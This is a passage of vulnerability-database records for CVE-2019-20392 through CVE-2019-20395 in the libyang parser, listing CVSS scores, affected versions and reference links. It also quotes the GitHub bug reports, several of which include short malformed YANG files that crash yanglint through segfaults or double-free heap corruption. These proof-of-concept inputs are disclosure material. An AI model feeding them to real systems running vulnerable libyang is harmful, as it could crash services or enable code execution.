"af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/772" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r1:*:*:*:*:*:*", "matchCriteriaId": "65E91322-5F67-43C2-8112-5ECAEC2A3C12", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r2:*:*:*:*:*:*", "matchCriteriaId": "80A88DE4-93F8-40C3-AA52-A5F353F028AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r1:*:*:*:*:*:*", "matchCriteriaId": "05C120CA-50EF-4B6D-92C9-ED736219DB07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r2:*:*:*:*:*:*", "matchCriteriaId": "99D1FA55-3F56-4E09-B41E-B05C199B96B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r1:*:*:*:*:*:*", "matchCriteriaId": "35D48EC4-58D2-49C6-8049-920787733587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r2:*:*:*:*:*:*", "matchCriteriaId": "B57F3953-49D6-413C-A4AE-03125935FC77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.14:r1:*:*:*:*:*:*", "matchCriteriaId": "DD62411F-A524-4E80-B540-780EA39CB6A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.15:r1:*:*:*:*:*:*", "matchCriteriaId": "FEF091B1-978A-4881-B1FC-6848CD1A7BBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "0C50D690-9A4D-4B78-BF4E-A4D9B4074216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "124A5D30-7451-4516-9AA2-963AE62DD679", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "C260D13B-82E9-4596-9116-61073B42D661", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:1.0:r1:*:*:*:*:*:*", "matchCriteriaId": "5F8D5FC0-959E-4014-9CB7-91378CC8B2BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:1.0:r2:*:*:*:*:*:*", "matchCriteriaId": "DCBDA519-805B-4193-8092-75E2748A7BC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/CESNET/libyang/issues/772
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
Hi, here is another file that crashes yangfuzz and yanglint. ``` module all { yang-version 1.1; namespace "urn:all"; prefix all_mod; grouping t1 { uses group1 { } leaf leaf12 { type bits { bit flag0 { position 0; if-feature "feat1"; } bit flag1; bit flag2 { position 2; } bit flag3 { position 3; } } default "flag0 flag3"; } list list1 { key "leaf18"; unique "leaf1--------------------------------------------------- leaf leaT18 { type string; } action act1 { input ons on thg leaf"; leaf leaf30 { type string; } } } augment "/cont1" { leaf leaf17 { type ideZtityref { base all_imp:iden44; } must "../leaf17 = 'all_imp:iden } action act1 { t5'"; } } } ``` Regards
Segmentation fault in yangfuzz and yanglint
https://api.github.com/repos/CESNET/libyang/issues/772/comments
1
2019-04-26T17:01:20Z
2020-01-23T09:16:54Z
https://github.com/CESNET/libyang/issues/772
437,762,832
772
1,021
CVE-2019-20392
2020-01-22T22:15:10.143
An invalid memory access flaw is present in libyang before v1.0-r1 in the function resolve_feature_value() when an if-feature statement is used inside a list key node, and the feature used is not defined. Applications that use libyang to parse untrusted input yang files may crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793922" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/32fb4993bc8bb49e93e84016af3c10ea53964be5" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/723" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793922" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/32fb4993bc8bb49e93e84016af3c10ea53964be5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/723" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r1:*:*:*:*:*:*", "matchCriteriaId": "65E91322-5F67-43C2-8112-5ECAEC2A3C12", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r2:*:*:*:*:*:*", "matchCriteriaId": "80A88DE4-93F8-40C3-AA52-A5F353F028AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r1:*:*:*:*:*:*", "matchCriteriaId": "05C120CA-50EF-4B6D-92C9-ED736219DB07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r2:*:*:*:*:*:*", "matchCriteriaId": "99D1FA55-3F56-4E09-B41E-B05C199B96B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r1:*:*:*:*:*:*", "matchCriteriaId": "35D48EC4-58D2-49C6-8049-920787733587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r2:*:*:*:*:*:*", "matchCriteriaId": "B57F3953-49D6-413C-A4AE-03125935FC77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.14:r1:*:*:*:*:*:*", "matchCriteriaId": "DD62411F-A524-4E80-B540-780EA39CB6A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.15:r1:*:*:*:*:*:*", "matchCriteriaId": "FEF091B1-978A-4881-B1FC-6848CD1A7BBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "0C50D690-9A4D-4B78-BF4E-A4D9B4074216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "124A5D30-7451-4516-9AA2-963AE62DD679", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "C260D13B-82E9-4596-9116-61073B42D661", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/CESNET/libyang/issues/723
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
If an if-feature statement is used inside a list key node, and the feature used is not defined, yanglint and yangfuzz segfault in lys_parse_path. Here is an example of a yang file that crashes the parser: ``` module links { namespace "urn:module2"; prefix mod2; list list-for-augment { key "keyleaf"; leaf keyleaf { if-feature foo; type string; } leaf test { type string; } } } ```
Segmentation fault when if-feature is used in list key node, with a non existing feature
https://api.github.com/repos/CESNET/libyang/issues/723/comments
7
2019-03-07T19:25:40Z
2020-01-23T15:30:39Z
https://github.com/CESNET/libyang/issues/723
418,474,100
723
1,022
CVE-2019-20393
2020-01-22T22:15:10.237
A double-free is present in libyang before v1.0-r1 in the function yyparse() when an empty description is used. Applications that use libyang to parse untrusted input yang files may be vulnerable to this flaw, which would cause a crash or potentially code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793930" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/d9feacc4a590d35dbc1af21caf9080008b4450ed" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/742" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793930" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/d9feacc4a590d35dbc1af21caf9080008b4450ed" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/742" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r1:*:*:*:*:*:*", "matchCriteriaId": "65E91322-5F67-43C2-8112-5ECAEC2A3C12", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r2:*:*:*:*:*:*", "matchCriteriaId": "80A88DE4-93F8-40C3-AA52-A5F353F028AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r1:*:*:*:*:*:*", "matchCriteriaId": "05C120CA-50EF-4B6D-92C9-ED736219DB07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r2:*:*:*:*:*:*", "matchCriteriaId": "99D1FA55-3F56-4E09-B41E-B05C199B96B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r1:*:*:*:*:*:*", "matchCriteriaId": "35D48EC4-58D2-49C6-8049-920787733587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r2:*:*:*:*:*:*", "matchCriteriaId": "B57F3953-49D6-413C-A4AE-03125935FC77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.14:r1:*:*:*:*:*:*", "matchCriteriaId": "DD62411F-A524-4E80-B540-780EA39CB6A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.15:r1:*:*:*:*:*:*", "matchCriteriaId": "FEF091B1-978A-4881-B1FC-6848CD1A7BBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "0C50D690-9A4D-4B78-BF4E-A4D9B4074216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "124A5D30-7451-4516-9AA2-963AE62DD679", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "C260D13B-82E9-4596-9116-61073B42D661", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/CESNET/libyang/issues/742
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
Hi, this file crashes lys_parse_path: ``` module links { yang-version 1.1; namespace "urn:mo:1"; prefix yang; import ietf-yang-metadata { prefix md; revision-date 2016-08-05; } md:annotation value { reference "RFC7950 section 7.7.9."; description; } } ```
Heap corruption in yyparse
https://api.github.com/repos/CESNET/libyang/issues/742/comments
1
2019-03-29T11:16:03Z
2020-01-23T09:16:30Z
https://github.com/CESNET/libyang/issues/742
426,937,550
742
1,023
CVE-2019-20394
2020-01-22T22:15:10.330
A double-free is present in libyang before v1.0-r3 in the function yyparse() when a type statement in used in a notification statement. Applications that use libyang to parse untrusted input yang files may be vulnerable to this flaw, which would cause a crash or potentially code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793932" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/6cc51b1757dfbb7cff92de074ada65e8523289a6" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v1.0-r2...v1.0-r3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/769" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793932" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/6cc51b1757dfbb7cff92de074ada65e8523289a6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v1.0-r2...v1.0-r3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/769" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r1:*:*:*:*:*:*", "matchCriteriaId": "65E91322-5F67-43C2-8112-5ECAEC2A3C12", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r2:*:*:*:*:*:*", "matchCriteriaId": "80A88DE4-93F8-40C3-AA52-A5F353F028AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r1:*:*:*:*:*:*", "matchCriteriaId": "05C120CA-50EF-4B6D-92C9-ED736219DB07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r2:*:*:*:*:*:*", "matchCriteriaId": "99D1FA55-3F56-4E09-B41E-B05C199B96B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r1:*:*:*:*:*:*", "matchCriteriaId": "35D48EC4-58D2-49C6-8049-920787733587", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.13:r2:*:*:*:*:*:*", "matchCriteriaId": "B57F3953-49D6-413C-A4AE-03125935FC77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.14:r1:*:*:*:*:*:*", "matchCriteriaId": "DD62411F-A524-4E80-B540-780EA39CB6A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.15:r1:*:*:*:*:*:*", "matchCriteriaId": "FEF091B1-978A-4881-B1FC-6848CD1A7BBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r1:*:*:*:*:*:*", "matchCriteriaId": "0C50D690-9A4D-4B78-BF4E-A4D9B4074216", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r2:*:*:*:*:*:*", "matchCriteriaId": "124A5D30-7451-4516-9AA2-963AE62DD679", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.16:r3:*:*:*:*:*:*", "matchCriteriaId": "C260D13B-82E9-4596-9116-61073B42D661", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:1.0:r1:*:*:*:*:*:*", "matchCriteriaId": "5F8D5FC0-959E-4014-9CB7-91378CC8B2BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:1.0:r2:*:*:*:*:*:*", "matchCriteriaId": "DCBDA519-805B-4193-8092-75E2748A7BC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/CESNET/libyang/issues/769
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CESNET", "libyang" ]
Hi, this file causes heap corruption and crashes lys_parse_path ``` module mod6 { prefix abc; namespace "http://www.example.c; yang-version 1.1; container cont1 { //x" { } augment "/aug-cont" { list list2 { key "key2"; leaf key2 { type string; } } notification nn { typedef Mt { type string { length "1..255"; } } container log { grouping g { notification nn { type j2an; } } ```
Heap corruption in lys_parse_path due to type statement in notification statement
https://api.github.com/repos/CESNET/libyang/issues/769/comments
1
2019-04-26T09:14:19Z
2020-01-23T09:16:42Z
https://github.com/CESNET/libyang/issues/769
437,576,729
769
1,024
CVE-2019-20395
2020-01-22T22:15:10.423
A stack consumption issue is present in libyang before v1.0-r1 due to the self-referential union type containing leafrefs. Applications that use libyang to parse untrusted input yang files may crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793924" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/4e610ccd87a2ba9413819777d508f71163fcc237" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/724" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793924" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/4e610ccd87a2ba9413819777d508f71163fcc237" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v0.16-r3...v1.0-r1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/724" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r1:*:*:*:*:*:*", "matchCriteriaId": "65E91322-5F67-43C2-8112-5ECAEC2A3C12", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.11:r2:*:*:*:*:*:*", "matchCriteriaId": "80A88DE4-93F8-40C3-AA52-A5F353F028AA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r1:*:*:*:*:*:*", "matchCriteriaId": "05C120CA-50EF-4B6D-92C9-ED736219DB07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cesnet:libyang:0.12:r2:*:*:*:*:*:*", "matchCriteriaId": "99D1FA55-3F56-4E09-B41E-B05C199B96B8", 